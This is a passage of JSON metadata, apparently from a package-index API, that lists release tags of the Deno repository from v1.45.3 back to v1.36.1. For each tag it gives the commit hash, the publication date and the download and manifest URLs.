/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tag